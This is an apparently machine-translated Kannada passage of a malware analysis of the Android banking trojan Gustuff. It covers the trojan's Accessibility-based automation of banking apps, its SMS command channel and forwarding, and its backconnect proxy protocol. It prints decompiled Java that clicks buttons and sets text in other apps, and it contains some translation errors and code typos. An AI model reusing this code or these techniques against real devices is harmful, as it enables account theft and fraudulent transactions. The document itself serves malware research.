    • Google Play ಕಾರ್ಡ್‌ನಂತೆ ವೇಷದಲ್ಲಿರುವ ಫಿಶಿಂಗ್ ವಿಂಡೋವನ್ನು ತೋರಿಸಿ.

  • ಸಂವಾದಾತ್ಮಕ — ಆಕ್ಸೆಸಿಬಿಲಿಟಿ ಸೇವೆಯನ್ನು ಬಳಸಿಕೊಂಡು ಇತರ ಅಪ್ಲಿಕೇಶನ್‌ಗಳ ವಿಂಡೋ ಅಂಶಗಳೊಂದಿಗೆ ಸಂವಹನ ನಡೆಸಲು ಆಜ್ಞೆಯನ್ನು ವಿನ್ಯಾಸಗೊಳಿಸಲಾಗಿದೆ. ಸಂವಾದಕ್ಕಾಗಿ ವಿಶೇಷ ಸೇವೆಯನ್ನು ಕಾರ್ಯಕ್ರಮದಲ್ಲಿ ಅಳವಡಿಸಲಾಗಿದೆ. ತನಿಖೆಯಲ್ಲಿರುವ ಅಪ್ಲಿಕೇಶನ್ ವಿಂಡೋಗಳೊಂದಿಗೆ ಸಂವಹನ ನಡೆಸಬಹುದು:
    • ಪ್ರಸ್ತುತ ಸಕ್ರಿಯವಾಗಿದೆ. ಈ ಸಂದರ್ಭದಲ್ಲಿ, ಪ್ಯಾರಾಮೀಟರ್ ನೀವು ಸಂವಹನ ಮಾಡಬೇಕಾದ ವಸ್ತುವಿನ ಐಡಿ ಅಥವಾ ಪಠ್ಯವನ್ನು (ಹೆಸರು) ಒಳಗೊಂಡಿರುತ್ತದೆ.
    • ಆಜ್ಞೆಯನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುವ ಸಮಯದಲ್ಲಿ ಬಳಕೆದಾರರಿಗೆ ಗೋಚರಿಸುತ್ತದೆ. ಅಪ್ಲಿಕೇಶನ್ ಐಡಿ ಮೂಲಕ ವಿಂಡೋಗಳನ್ನು ಆಯ್ಕೆ ಮಾಡುತ್ತದೆ.

    ವಸ್ತುಗಳನ್ನು ಸ್ವೀಕರಿಸಿದ ನಂತರ ಪ್ರವೇಶಿಸುವಿಕೆನೋಡ್ಇನ್ಫೋ ಆಸಕ್ತಿಯ ವಿಂಡೋ ಅಂಶಗಳಿಗಾಗಿ, ನಿಯತಾಂಕಗಳನ್ನು ಅವಲಂಬಿಸಿ ಅಪ್ಲಿಕೇಶನ್ ಈ ಕೆಳಗಿನ ಕ್ರಿಯೆಗಳನ್ನು ಮಾಡಬಹುದು:

    • ಕೇಂದ್ರಬಿಂದು - ವಸ್ತುವಿಗೆ ಗಮನವನ್ನು ಹೊಂದಿಸಿ.
    • ಕ್ಲಿಕ್ ಮಾಡಿ - ವಸ್ತುವಿನ ಮೇಲೆ ಕ್ಲಿಕ್ ಮಾಡಿ.
    • actionId - ID ಮೂಲಕ ಕ್ರಿಯೆಯನ್ನು ನಿರ್ವಹಿಸಿ.
    • setText - ವಸ್ತುವಿನ ಪಠ್ಯವನ್ನು ಬದಲಾಯಿಸಿ. ಪಠ್ಯವನ್ನು ಬದಲಾಯಿಸುವುದು ಎರಡು ರೀತಿಯಲ್ಲಿ ಸಾಧ್ಯ: ಕ್ರಿಯೆಯನ್ನು ಮಾಡಿ ACTION_SET_TEXT (ಸೋಂಕಿತ ಸಾಧನದ Android ಆವೃತ್ತಿಯು ಚಿಕ್ಕದಾಗಿದ್ದರೆ ಅಥವಾ ಸಮನಾಗಿರುತ್ತದೆ ಲಾಲಿಪ್ಅಪ್), ಅಥವಾ ಕ್ಲಿಪ್‌ಬೋರ್ಡ್‌ನಲ್ಲಿ ಸ್ಟ್ರಿಂಗ್ ಅನ್ನು ಇರಿಸುವ ಮೂಲಕ ಮತ್ತು ಅದನ್ನು ಆಬ್ಜೆಕ್ಟ್‌ಗೆ ಅಂಟಿಸುವ ಮೂಲಕ (ಹಳೆಯ ಆವೃತ್ತಿಗಳಿಗೆ). ಬ್ಯಾಂಕಿಂಗ್ ಅಪ್ಲಿಕೇಶನ್‌ನಲ್ಲಿ ಡೇಟಾವನ್ನು ಬದಲಾಯಿಸಲು ಈ ಆಜ್ಞೆಯನ್ನು ಬಳಸಬಹುದು.

2. PARAMS_ACTIONS - ಅದರಂತೆ PARAMS_ACTION, JSON ಕಮಾಂಡ್‌ಗಳ ರಚನೆ ಮಾತ್ರ ಬರುತ್ತದೆ.

ಮತ್ತೊಂದು ಅಪ್ಲಿಕೇಶನ್‌ನ ವಿಂಡೋ ಅಂಶಗಳೊಂದಿಗೆ ಸಂವಹನ ಮಾಡುವ ಕಾರ್ಯವು ಹೇಗೆ ಕಾಣುತ್ತದೆ ಎಂಬುದರ ಬಗ್ಗೆ ಅನೇಕ ಜನರು ಆಸಕ್ತಿ ವಹಿಸುತ್ತಾರೆ ಎಂದು ತೋರುತ್ತದೆ. ಗಸ್ಟಫ್‌ನಲ್ಲಿ ಈ ಕಾರ್ಯವನ್ನು ಹೇಗೆ ಅಳವಡಿಸಲಾಗಿದೆ:

boolean interactiveAction(List aiList, JSONObject action, JsonObject res) {
    int count = action.optInt("repeat", 1);
    Iterator aiListIterator = ((Iterable)aiList).iterator();
    int count = 0;
    while(aiListIterator.hasNext()) {
        Object ani = aiListIterator.next();
        if(1 <= count) {
            int index;
            for(index = 1; true; ++index) {
                if(action.has("focus")) {
                    if(((AccessibilityNodeInfo)ani).performAction(1)) {
                        ++count;
                    }
                }
                else if(action.has("click")) {
                    if(((AccessibilityNodeInfo)ani).performAction(16)) {
                        ++count;
                    }
                }
                else if(action.has("actionId")) {
                    if(((AccessibilityNodeInfo)ani).performAction(action.optInt("actionId"))) {
                        ++count;
                    }
                }
                else if(action.has("setText")) {
                    customHeader ch = CustomAccessibilityService.a;
                    Context context = this.getApplicationContext();
                    String text = action.optString("setText");
                    if(performSetTextAction(ch, context, ((AccessibilityNodeInfo)ani), text)) {
                        ++count;
                    }
                }
                if(index == count) {
                    break;
                }
            }
        }
        ((AccessibilityNodeInfo)ani).recycle();
    }
    res.addPropertyNumber("res", Integer.valueOf(count));
}

ಪಠ್ಯ ಬದಲಿ ಕಾರ್ಯ:

boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
    boolean result;
    if(Build$VERSION.SDK_INT >= 21) {
        Bundle b = new Bundle();
        b.putCharSequence("ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE", ((CharSequence)text));
        result = ani.performAction(0x200000, b);  // ACTION_SET_TEXT
    }
    else {
        Object clipboard = context.getSystemService("clipboard");
        if(clipboard != null) {
        ((ClipboardManager)clipboard).setPrimaryClip(ClipData.newPlainText("autofill_pm", ((CharSequence)text)));
        result = ani.performAction(0x8000);  // ACTION_PASTE
        }
        else {
            result = false;
        }
    }
    return result;
}

ಹೀಗಾಗಿ, ನಿಯಂತ್ರಣ ಸರ್ವರ್‌ನ ಸರಿಯಾದ ಸಂರಚನೆಯೊಂದಿಗೆ, ಗಸ್ಟಫ್ ಬ್ಯಾಂಕಿಂಗ್ ಅಪ್ಲಿಕೇಶನ್‌ನಲ್ಲಿ ಪಠ್ಯ ಕ್ಷೇತ್ರಗಳನ್ನು ಭರ್ತಿ ಮಾಡಲು ಸಾಧ್ಯವಾಗುತ್ತದೆ ಮತ್ತು ವಹಿವಾಟನ್ನು ಪೂರ್ಣಗೊಳಿಸಲು ಅಗತ್ಯವಾದ ಬಟನ್‌ಗಳ ಮೇಲೆ ಕ್ಲಿಕ್ ಮಾಡಿ. ಟ್ರೋಜನ್ ಅಪ್ಲಿಕೇಶನ್‌ಗೆ ಲಾಗ್ ಇನ್ ಮಾಡುವ ಅಗತ್ಯವಿಲ್ಲ - ಪುಶ್ ಅಧಿಸೂಚನೆಯನ್ನು ಪ್ರದರ್ಶಿಸಲು ಆಜ್ಞೆಯನ್ನು ಕಳುಹಿಸಲು ಮತ್ತು ಹಿಂದೆ ಸ್ಥಾಪಿಸಲಾದ ಬ್ಯಾಂಕಿಂಗ್ ಅಪ್ಲಿಕೇಶನ್ ಅನ್ನು ತೆರೆಯಲು ಸಾಕು. ಬಳಕೆದಾರನು ತನ್ನನ್ನು ತಾನೇ ದೃಢೀಕರಿಸುತ್ತಾನೆ, ಅದರ ನಂತರ ಗಸ್ಟಫ್ ಕಾರನ್ನು ತುಂಬಲು ಸಾಧ್ಯವಾಗುತ್ತದೆ.

SMS ಸಂದೇಶ ಪ್ರಕ್ರಿಯೆ ಮಾಡ್ಯೂಲ್

ಸೋಂಕಿತ ಸಾಧನಕ್ಕೆ SMS ಸಂದೇಶಗಳನ್ನು ಸ್ವೀಕರಿಸಲು ಅಪ್ಲಿಕೇಶನ್ ಈವೆಂಟ್ ಹ್ಯಾಂಡ್ಲರ್ ಅನ್ನು ಸ್ಥಾಪಿಸುತ್ತದೆ. ಅಧ್ಯಯನದ ಅಡಿಯಲ್ಲಿ ಅಪ್ಲಿಕೇಶನ್ ಆಪರೇಟರ್‌ನಿಂದ ಆಜ್ಞೆಗಳನ್ನು ಪಡೆಯಬಹುದು, ಅದು SMS ಸಂದೇಶದ ದೇಹದಲ್ಲಿ ಬರುತ್ತದೆ. ಆಜ್ಞೆಗಳು ರೂಪದಲ್ಲಿ ಬರುತ್ತವೆ:

7!5=<%Base64 ಎನ್‌ಕೋಡ್ ಮಾಡಿದ ಆಜ್ಞೆ%>

ಅಪ್ಲಿಕೇಶನ್ ಎಲ್ಲಾ ಒಳಬರುವ SMS ಸಂದೇಶಗಳಲ್ಲಿ ಸ್ಟ್ರಿಂಗ್ ಅನ್ನು ಹುಡುಕುತ್ತದೆ 7!5=, ಸ್ಟ್ರಿಂಗ್ ಪತ್ತೆಯಾದಾಗ, ಅದು ಆಫ್‌ಸೆಟ್ 64 ನಲ್ಲಿ Base4 ನಿಂದ ಸ್ಟ್ರಿಂಗ್ ಅನ್ನು ಡಿಕೋಡ್ ಮಾಡುತ್ತದೆ ಮತ್ತು ಆಜ್ಞೆಯನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸುತ್ತದೆ. ಆಜ್ಞೆಗಳು CnC ಯಂತೆಯೇ ಇರುತ್ತವೆ. ಆಜ್ಞೆಯು ಬಂದ ಅದೇ ಸಂಖ್ಯೆಗೆ ಮರಣದಂಡನೆಯ ಫಲಿತಾಂಶವನ್ನು ಕಳುಹಿಸಲಾಗುತ್ತದೆ. ಪ್ರತಿಕ್ರಿಯೆ ಸ್ವರೂಪ:

7*5=<%Base64 ಎನ್‌ಕೋಡ್‌ನ “result_code ಆಜ್ಞೆ”%>

ಐಚ್ಛಿಕವಾಗಿ, ಅಪ್ಲಿಕೇಶನ್ ಎಲ್ಲಾ ಸ್ವೀಕರಿಸಿದ ಸಂದೇಶಗಳನ್ನು ರೂಟ್ ಸಂಖ್ಯೆಗೆ ಕಳುಹಿಸಬಹುದು. ಇದನ್ನು ಮಾಡಲು, ಆದ್ಯತೆಯ ಫೈಲ್‌ನಲ್ಲಿ ರೂಟ್ ಸಂಖ್ಯೆಯನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸಬೇಕು ಮತ್ತು ಸಂದೇಶ ಮರುನಿರ್ದೇಶನ ಫ್ಲ್ಯಾಗ್ ಅನ್ನು ಹೊಂದಿಸಬೇಕು. ಸ್ವರೂಪದಲ್ಲಿ ಆಕ್ರಮಣಕಾರರ ಸಂಖ್ಯೆಗೆ SMS ಸಂದೇಶವನ್ನು ಕಳುಹಿಸಲಾಗುತ್ತದೆ:

<%ಸಂಖ್ಯೆಯಿಂದ%> - <%ಸಮಯ, ಸ್ವರೂಪ: dd/MM/yyyy HH:mm:ss%> <%SMS ದೇಹ%>

ಅಲ್ಲದೆ, ಐಚ್ಛಿಕವಾಗಿ, ಅಪ್ಲಿಕೇಶನ್ CnC ಗೆ ಸಂದೇಶಗಳನ್ನು ಕಳುಹಿಸಬಹುದು. SMS ಸಂದೇಶವನ್ನು JSON ಸ್ವರೂಪದಲ್ಲಿ ಸರ್ವರ್‌ಗೆ ಕಳುಹಿಸಲಾಗಿದೆ:

{
    "id":<%BotID%>,
    "sms":
    {
        "text":<%SMS body%>,
        "number":<%From number%>,
        "date":<%Timestamp%>
    }
}

ಧ್ವಜವನ್ನು ಹೊಂದಿಸಿದರೆ ನೇಮ್ ಜನರೇಟರ್("DEFAULT_APP_SMS") - ಅಪ್ಲಿಕೇಶನ್ SMS ಸಂದೇಶವನ್ನು ಪ್ರಕ್ರಿಯೆಗೊಳಿಸುವುದನ್ನು ನಿಲ್ಲಿಸುತ್ತದೆ ಮತ್ತು ಒಳಬರುವ ಸಂದೇಶಗಳ ಪಟ್ಟಿಯನ್ನು ತೆರವುಗೊಳಿಸುತ್ತದೆ.

ಪ್ರಾಕ್ಸಿ ಮಾಡ್ಯೂಲ್

ಅಧ್ಯಯನದ ಅಡಿಯಲ್ಲಿ ಅಪ್ಲಿಕೇಶನ್ ಬ್ಯಾಕ್‌ಕನೆಕ್ಟ್ ಪ್ರಾಕ್ಸಿ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಒಳಗೊಂಡಿದೆ (ಇನ್ನು ಮುಂದೆ ಪ್ರಾಕ್ಸಿ ಮಾಡ್ಯೂಲ್ ಎಂದು ಉಲ್ಲೇಖಿಸಲಾಗುತ್ತದೆ), ಇದು ಕಾನ್ಫಿಗರೇಶನ್‌ನೊಂದಿಗೆ ಸ್ಥಿರ ಕ್ಷೇತ್ರಗಳನ್ನು ಒಳಗೊಂಡಿರುವ ಪ್ರತ್ಯೇಕ ವರ್ಗವನ್ನು ಹೊಂದಿದೆ. ಕಾನ್ಫಿಗರೇಶನ್ ಡೇಟಾವನ್ನು ಮಾದರಿಯಲ್ಲಿ ಸ್ಪಷ್ಟ ರೂಪದಲ್ಲಿ ಸಂಗ್ರಹಿಸಲಾಗಿದೆ:

ಆಂಡ್ರಾಯ್ಡ್ ಟ್ರೋಜನ್ ಗಸ್ಟಫ್ ನಿಮ್ಮ ಖಾತೆಗಳಿಂದ ಕ್ರೀಮ್ (ಫಿಯಟ್ ಮತ್ತು ಕ್ರಿಪ್ಟೋ) ಅನ್ನು ಹೇಗೆ ಸ್ಕಿಮ್ ಮಾಡುತ್ತದೆ

ಪ್ರಾಕ್ಸಿ ಮಾಡ್ಯೂಲ್‌ನಿಂದ ನಿರ್ವಹಿಸಲಾದ ಎಲ್ಲಾ ಕ್ರಿಯೆಗಳನ್ನು ಫೈಲ್‌ಗಳಿಗೆ ಲಾಗ್ ಇನ್ ಮಾಡಲಾಗಿದೆ. ಇದನ್ನು ಮಾಡಲು, ಬಾಹ್ಯ ಸಂಗ್ರಹಣೆಯಲ್ಲಿನ ಅಪ್ಲಿಕೇಶನ್ "ಲಾಗ್ಗಳು" ಎಂಬ ಡೈರೆಕ್ಟರಿಯನ್ನು ರಚಿಸುತ್ತದೆ (ಕಾನ್ಫಿಗರೇಶನ್ ವರ್ಗದಲ್ಲಿ ProxyConfigClass.logsDir ಕ್ಷೇತ್ರ), ಇದರಲ್ಲಿ ಲಾಗ್ ಫೈಲ್ಗಳನ್ನು ಸಂಗ್ರಹಿಸಲಾಗುತ್ತದೆ. ಹೆಸರುಗಳೊಂದಿಗೆ ಫೈಲ್‌ಗಳಲ್ಲಿ ಲಾಗಿಂಗ್ ಸಂಭವಿಸುತ್ತದೆ:

  1. main.txt – CommandServer ಎಂಬ ವರ್ಗದ ಕೆಲಸವನ್ನು ಈ ಫೈಲ್‌ಗೆ ಲಾಗ್ ಇನ್ ಮಾಡಲಾಗಿದೆ. ಈ ಕೆಳಗಿನವುಗಳಲ್ಲಿ, ಈ ಫೈಲ್‌ಗೆ ಸ್ಟ್ರಿಂಗ್ ಸ್ಟ್ರಿಂಗ್ ಅನ್ನು ಲಾಗ್ ಮಾಡುವುದನ್ನು mainLog(str) ಎಂದು ಸೂಚಿಸಲಾಗುತ್ತದೆ.
  2. ಅಧಿವೇಶನ-<%id%>.txt — ಈ ಫೈಲ್ ನಿರ್ದಿಷ್ಟ ಪ್ರಾಕ್ಸಿ ಸೆಶನ್‌ಗೆ ಸಂಬಂಧಿಸಿದ ಲಾಗ್ ಡೇಟಾವನ್ನು ಉಳಿಸುತ್ತದೆ. ಈ ಕೆಳಗಿನವುಗಳಲ್ಲಿ, ಈ ಫೈಲ್‌ಗೆ ಸ್ಟ್ರಿಂಗ್ ಸ್ಟ್ರಿಂಗ್ ಅನ್ನು ಲಾಗ್ ಮಾಡುವುದನ್ನು ಸೆಷನ್‌ಲಾಗ್ (str) ಎಂದು ಸೂಚಿಸಲಾಗುತ್ತದೆ.
  3. server.txt - ಮೇಲೆ ವಿವರಿಸಿದ ಫೈಲ್‌ಗಳಿಗೆ ಬರೆಯಲಾದ ಎಲ್ಲಾ ಡೇಟಾವನ್ನು ಲಾಗ್ ಮಾಡಲು ಈ ಫೈಲ್ ಅನ್ನು ಬಳಸಲಾಗುತ್ತದೆ.

ಲಾಗ್ ಡೇಟಾ ಸ್ವರೂಪ:

<%Date%> [ಥ್ರೆಡ್[<%thread id%>], id[]]: ಲಾಗ್-ಸ್ಟ್ರಿಂಗ್

ಪ್ರಾಕ್ಸಿ ಮಾಡ್ಯೂಲ್‌ನ ಕಾರ್ಯಾಚರಣೆಯ ಸಮಯದಲ್ಲಿ ಸಂಭವಿಸುವ ವಿನಾಯಿತಿಗಳನ್ನು ಸಹ ಫೈಲ್‌ಗೆ ಲಾಗ್ ಮಾಡಲಾಗಿದೆ. ಇದನ್ನು ಮಾಡಲು, ಅಪ್ಲಿಕೇಶನ್ ಈ ಕೆಳಗಿನ ಸ್ವರೂಪದಲ್ಲಿ JSON ವಸ್ತುವನ್ನು ಉತ್ಪಾದಿಸುತ್ತದೆ:

{
    "uncaughtException":<%short description of throwable%>
    "thread":<%thread%>
    "message":<%detail message of throwable%>
    "trace":        //Stack trace info
        [
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            },
            {
                "ClassName":
                "FileName":
                "LineNumber":
                "MethodName":
            }
        ]
}

ನಂತರ ಅದನ್ನು ಸ್ಟ್ರಿಂಗ್ ಪ್ರಾತಿನಿಧ್ಯಕ್ಕೆ ಪರಿವರ್ತಿಸುತ್ತದೆ ಮತ್ತು ಅದನ್ನು ಲಾಗ್ ಮಾಡುತ್ತದೆ.

ಅನುಗುಣವಾದ ಆಜ್ಞೆಯನ್ನು ಸ್ವೀಕರಿಸಿದ ನಂತರ ಪ್ರಾಕ್ಸಿ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಪ್ರಾರಂಭಿಸಲಾಗುತ್ತದೆ. ಪ್ರಾಕ್ಸಿ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಪ್ರಾರಂಭಿಸಲು ಆಜ್ಞೆಯನ್ನು ಸ್ವೀಕರಿಸಿದಾಗ, ಅಪ್ಲಿಕೇಶನ್ ಎಂಬ ಸೇವೆಯನ್ನು ಪ್ರಾರಂಭಿಸುತ್ತದೆ ಮುಖ್ಯ ಸೇವೆ, ಇದು ಪ್ರಾಕ್ಸಿ ಮಾಡ್ಯೂಲ್ನ ಕಾರ್ಯಾಚರಣೆಯನ್ನು ನಿರ್ವಹಿಸುವ ಜವಾಬ್ದಾರಿಯನ್ನು ಹೊಂದಿದೆ - ಅದನ್ನು ಪ್ರಾರಂಭಿಸುವುದು ಮತ್ತು ನಿಲ್ಲಿಸುವುದು.

ಸೇವೆಯನ್ನು ಪ್ರಾರಂಭಿಸುವ ಹಂತಗಳು:

1. ನಿಮಿಷಕ್ಕೊಮ್ಮೆ ನಡೆಯುವ ಟೈಮರ್ ಅನ್ನು ಪ್ರಾರಂಭಿಸುತ್ತದೆ ಮತ್ತು ಪ್ರಾಕ್ಸಿ ಮಾಡ್ಯೂಲ್‌ನ ಚಟುವಟಿಕೆಯನ್ನು ಪರಿಶೀಲಿಸುತ್ತದೆ. ಮಾಡ್ಯೂಲ್ ಸಕ್ರಿಯವಾಗಿಲ್ಲದಿದ್ದರೆ, ಅದು ಅದನ್ನು ಪ್ರಾರಂಭಿಸುತ್ತದೆ.
ಈವೆಂಟ್ ಅನ್ನು ಪ್ರಚೋದಿಸಿದಾಗ ಸಹ android.net.conn.CONNECTIVITY_CHANGE ಪ್ರಾಕ್ಸಿ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ಪ್ರಾರಂಭಿಸಲಾಗಿದೆ.

2. ಅಪ್ಲಿಕೇಶನ್ ಪ್ಯಾರಾಮೀಟರ್‌ನೊಂದಿಗೆ ವೇಕ್-ಲಾಕ್ ಅನ್ನು ರಚಿಸುತ್ತದೆ PARTIAL_WAKE_LOCK ಮತ್ತು ಅವನನ್ನು ಸೆರೆಹಿಡಿಯುತ್ತಾನೆ. ಇದು ಸಾಧನದ CPU ಅನ್ನು ಸ್ಲೀಪ್ ಮೋಡ್‌ಗೆ ಹೋಗದಂತೆ ತಡೆಯುತ್ತದೆ.

3. ಪ್ರಾಕ್ಸಿ ಮಾಡ್ಯೂಲ್ನ ಕಮಾಂಡ್ ಪ್ರೊಸೆಸಿಂಗ್ ವರ್ಗವನ್ನು ಪ್ರಾರಂಭಿಸುತ್ತದೆ, ಮೊದಲು ಲೈನ್ ಅನ್ನು ಲಾಗ್ ಮಾಡುವುದು ಮುಖ್ಯ ಲಾಗ್ ("ಪ್ರಾರಂಭ ಸರ್ವರ್") и

ಸರ್ವರ್::start() host[<%proxy_cnc%>], commandPort[<%command_port%>], proxyPort[<%proxy_port%>]

ಅಲ್ಲಿ proxy_cnc, command_port ಮತ್ತು proxy_port - ಪ್ರಾಕ್ಸಿ ಸರ್ವರ್ ಕಾನ್ಫಿಗರೇಶನ್‌ನಿಂದ ಪಡೆದ ನಿಯತಾಂಕಗಳು.

ಕಮಾಂಡ್ ಪ್ರೊಸೆಸಿಂಗ್ ವರ್ಗ ಎಂದು ಕರೆಯಲಾಗುತ್ತದೆ ಕಮಾಂಡ್ ಕನೆಕ್ಷನ್. ಪ್ರಾರಂಭವಾದ ತಕ್ಷಣ, ಈ ಕೆಳಗಿನ ಕ್ರಿಯೆಗಳನ್ನು ನಿರ್ವಹಿಸುತ್ತದೆ:

4. ಗೆ ಸಂಪರ್ಕಿಸುತ್ತದೆ ProxyConfigClass.host: ProxyConfigClass.commandPort ಮತ್ತು ಸೋಂಕಿತ ಸಾಧನದ ಕುರಿತು ಡೇಟಾವನ್ನು JSON ಸ್ವರೂಪದಲ್ಲಿ ಕಳುಹಿಸುತ್ತದೆ:

{
    "id":<%id%>,
    "imei":<%imei%>,
    "imsi":<%imsi%>,
    "model":<%model%>,
    "manufacturer":<%manufacturer%>,
    "androidVersion":<%androidVersion%>,
    "country":<%country%>,
    "partnerId":<%partnerId%>,
    "packageName":<%packageName%>,
    "networkType":<%networkType%>,
    "hasGsmSupport":<%hasGsmSupport%>,
    "simReady":<%simReady%>,
    "simCountry":<%simCountry%>,
    "networkOperator":<%networkOperator%>,
    "simOperator":<%simOperator%>,
    "version":<%version%>
}

ಎಲ್ಲಿ:

  • ಐಡಿ - ಐಡೆಂಟಿಫೈಯರ್, "x" ಹೆಸರಿನ ಹಂಚಿದ ಪ್ರಾಶಸ್ತ್ಯ ಫೈಲ್‌ನಿಂದ "ಐಡಿ" ಕ್ಷೇತ್ರದೊಂದಿಗೆ ಮೌಲ್ಯವನ್ನು ಪಡೆಯಲು ಪ್ರಯತ್ನಿಸುತ್ತದೆ. ಈ ಮೌಲ್ಯವನ್ನು ಪಡೆಯಲಾಗದಿದ್ದರೆ, ಅದು ಹೊಸದನ್ನು ಉತ್ಪಾದಿಸುತ್ತದೆ. ಹೀಗಾಗಿ, ಪ್ರಾಕ್ಸಿ ಮಾಡ್ಯೂಲ್ ತನ್ನದೇ ಆದ ಐಡೆಂಟಿಫೈಯರ್ ಅನ್ನು ಹೊಂದಿದೆ, ಇದು ಬಾಟ್ ID ಯಂತೆಯೇ ಉತ್ಪತ್ತಿಯಾಗುತ್ತದೆ.
  • imei - ಸಾಧನದ IMEI. ಮೌಲ್ಯವನ್ನು ಪಡೆಯುವ ಪ್ರಕ್ರಿಯೆಯಲ್ಲಿ ದೋಷ ಸಂಭವಿಸಿದಲ್ಲಿ, ಈ ಕ್ಷೇತ್ರದ ಬದಲಿಗೆ ದೋಷ ಪಠ್ಯ ಸಂದೇಶವನ್ನು ಬರೆಯಲಾಗುತ್ತದೆ.
  • imsi - ಸಾಧನದ ಅಂತರರಾಷ್ಟ್ರೀಯ ಮೊಬೈಲ್ ಚಂದಾದಾರರ ಗುರುತು. ಮೌಲ್ಯವನ್ನು ಪಡೆಯುವ ಪ್ರಕ್ರಿಯೆಯಲ್ಲಿ ದೋಷ ಸಂಭವಿಸಿದಲ್ಲಿ, ಈ ಕ್ಷೇತ್ರದ ಬದಲಿಗೆ ದೋಷ ಪಠ್ಯ ಸಂದೇಶವನ್ನು ಬರೆಯಲಾಗುತ್ತದೆ.
  • ಮಾದರಿ - ಅಂತಿಮ ಉತ್ಪನ್ನದ ಅಂತಿಮ ಬಳಕೆದಾರ-ಗೋಚರ ಹೆಸರು.
  • ತಯಾರಕ — ಉತ್ಪನ್ನ/ಹಾರ್ಡ್‌ವೇರ್‌ನ ತಯಾರಕ (Build.MANUFACTURER).
  • androidVersion - "<%release_version%> (<%os_version%>),<%sdk_version%>" ಸ್ವರೂಪದಲ್ಲಿರುವ ಸ್ಟ್ರಿಂಗ್
  • ದೇಶ - ಸಾಧನದ ಪ್ರಸ್ತುತ ಸ್ಥಳ.
  • partnerId ಖಾಲಿ ಸ್ಟ್ರಿಂಗ್ ಆಗಿದೆ.
  • ಪ್ಯಾಕೇಜ್ ಹೆಸರು - ಪ್ಯಾಕೇಜ್ ಹೆಸರು.
  • ನೆಟ್ವರ್ಕ್ ಪ್ರಕಾರ - ಪ್ರಸ್ತುತ ನೆಟ್ವರ್ಕ್ ಸಂಪರ್ಕದ ಪ್ರಕಾರ (ಉದಾಹರಣೆ: "WIFI", "MOBILE"). ದೋಷದ ಸಂದರ್ಭದಲ್ಲಿ, ಶೂನ್ಯವನ್ನು ಹಿಂತಿರುಗಿಸುತ್ತದೆ.
  • hasGsmSupport - ನಿಜ - ಫೋನ್ GSM ಅನ್ನು ಬೆಂಬಲಿಸಿದರೆ, ಇಲ್ಲದಿದ್ದರೆ ತಪ್ಪು.
  • simReady - SIM ಕಾರ್ಡ್ ಸ್ಥಿತಿ.
  • simCountry - ISO ದೇಶದ ಕೋಡ್ (SIM ಕಾರ್ಡ್ ಒದಗಿಸುವವರನ್ನು ಆಧರಿಸಿ).
  • ನೆಟ್ವರ್ಕ್ ಆಪರೇಟರ್ - ಆಪರೇಟರ್ ಹೆಸರು. ಮೌಲ್ಯವನ್ನು ಪಡೆಯುವ ಪ್ರಕ್ರಿಯೆಯಲ್ಲಿ ದೋಷ ಸಂಭವಿಸಿದಲ್ಲಿ, ಈ ಕ್ಷೇತ್ರದ ಬದಲಿಗೆ ದೋಷ ಪಠ್ಯ ಸಂದೇಶವನ್ನು ಬರೆಯಲಾಗುತ್ತದೆ.
  • simOperator — ಸೇವಾ ಪೂರೈಕೆದಾರರ ಹೆಸರು (SPN). ಮೌಲ್ಯವನ್ನು ಪಡೆಯುವ ಪ್ರಕ್ರಿಯೆಯಲ್ಲಿ ದೋಷ ಸಂಭವಿಸಿದಲ್ಲಿ, ಈ ಕ್ಷೇತ್ರದ ಬದಲಿಗೆ ದೋಷ ಪಠ್ಯ ಸಂದೇಶವನ್ನು ಬರೆಯಲಾಗುತ್ತದೆ.
  • ಆವೃತ್ತಿ - ಈ ಕ್ಷೇತ್ರವನ್ನು ಸಂರಚನಾ ವರ್ಗದಲ್ಲಿ ಸಂಗ್ರಹಿಸಲಾಗಿದೆ; ಬೋಟ್‌ನ ಪರೀಕ್ಷಿತ ಆವೃತ್ತಿಗಳಿಗೆ ಇದು “1.6” ಗೆ ಸಮಾನವಾಗಿರುತ್ತದೆ.

5. ಸರ್ವರ್‌ನಿಂದ ಆಜ್ಞೆಗಳಿಗಾಗಿ ಕಾಯುವ ಮೋಡ್‌ಗೆ ಬದಲಾಯಿಸುತ್ತದೆ. ಸರ್ವರ್‌ನಿಂದ ಆಜ್ಞೆಗಳು ಸ್ವರೂಪದಲ್ಲಿ ಬರುತ್ತವೆ:

  • 0 ಆಫ್ಸೆಟ್ - ಆಜ್ಞೆ
  • 1 ಆಫ್‌ಸೆಟ್ - ಸೆಶನ್‌ಐಡಿ
  • 2 ಆಫ್ಸೆಟ್ - ಉದ್ದ
  • 4 ಆಫ್ಸೆಟ್ - ಡೇಟಾ

ಆಜ್ಞೆಯು ಬಂದಾಗ, ಅಪ್ಲಿಕೇಶನ್ ಲಾಗ್ ಆಗುತ್ತದೆ:
mainLog("ಹೆಡರ್ { sessionId<%id%>], ಪ್ರಕಾರ[<%command%>], ಉದ್ದ[<%length%>] }")

ಸರ್ವರ್‌ನಿಂದ ಕೆಳಗಿನ ಆಜ್ಞೆಗಳು ಸಾಧ್ಯ:

ಹೆಸರು ಕಮಾಂಡ್ ಡೇಟಾ ವಿವರಣೆ
ಸಂಪರ್ಕ ಐಡಿ 0 ಸಂಪರ್ಕ ID ಹೊಸ ಸಂಪರ್ಕವನ್ನು ರಚಿಸಿ
ಸ್ಲೀಪ್ 3 ಟೈಮ್ ಪ್ರಾಕ್ಸಿ ಮಾಡ್ಯೂಲ್ ಅನ್ನು ವಿರಾಮಗೊಳಿಸಿ
PING_PONG 4 - PONG ಸಂದೇಶವನ್ನು ಕಳುಹಿಸಿ

PONG ಸಂದೇಶವು 4 ಬೈಟ್‌ಗಳನ್ನು ಒಳಗೊಂಡಿರುತ್ತದೆ ಮತ್ತು ಈ ರೀತಿ ಕಾಣುತ್ತದೆ: 0x04000000.

